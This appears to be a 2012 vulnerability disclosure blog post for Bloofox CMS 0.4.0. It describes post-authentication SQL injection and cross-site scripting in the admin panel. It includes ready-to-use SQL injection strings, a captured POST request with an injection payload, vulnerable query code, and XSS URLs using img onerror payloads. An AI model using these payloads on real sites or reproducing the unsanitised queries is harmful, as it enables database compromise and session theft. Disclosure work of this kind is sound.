# TITLE ....... # Multiple Post-auth sql injection/xss in Bloofox CMS 0.4.0 .... #
# DATE ........ # 08.03.2012
# AUTOHR ...... # http://hauntit.blogspot.com
# SOFT LINK ... # http://www.bloofox.com/
# VERSION ..... # 0.4.0
# TESTED ON ... # LAMP
# .............................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
This is sql injection bug, but important is fact that this vulnerability
can be triggered only by 'editor'-role user.
#............................................#
# 3. Where is bug :)
# A) sqli
Log in as a 'editor'-role user.
http://bloofoxCMS_0.4.0/admin/index.php?page=profiles&user_id=;'
And here is view from source code:
...cut...
bloofoxCMS_0.4.0/admin$ grep -n -r -e "uid" ./ | grep -e "\\$"| grep GET
./include/inc_user_user.php:152: $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
./include/inc_user_user.php:210: $db->query("SELECT uid,username FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
...cut...
Try this:
&user_id=2' or '1'%3d'2
&user_id=2' or '2'%3d'2
;)
#............................................#
# B) sqli-02
...cut from Burp...
POST /www/lastz/bloofoxcms/bloofoxCMS_0.4.0/admin/index.php?mode=content&action=new HTTP/1.1
Host: localhost
(...)
Connection: close
name=AAAAAAAA3&link_type=3&link_url=&link_eid=1'%20and%20password%20%3d%20'1'%20or%20'1'%3d'1'&link_plugin=3&insert=1&insert_where=0&link_target=&link_param=&blocked=0&invisible=0&startdate=&enddate=&keywords=&description=&template_id=0&send=Add+Page
...cut from Burp...
Vulnerable parameter is link_eid.
This command should help You find vulnerable code:
@bloofoxCMS_0.4.0/admin$ grep -n -r -e link_eid ./
Another vulnerable parameter is "insert", "eid",
#............................................#
# C) xss
All parameters are vulnerable to XSS too.
#............................................#
# xss-02
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=%22%2f%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E%3C&type=1
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=de.gif&type=%22}}%27%22%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E
Vulnerable parameters: 'file'.
Some sqli, You should get here too:
When You are updating Your profile (as an editor) at /admin/index.php?page=myprofile
Try this parameters to make test-attacks: showemail, gender, be_lang, be_tmpl
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
No comments:
Post a Comment
What do You think...?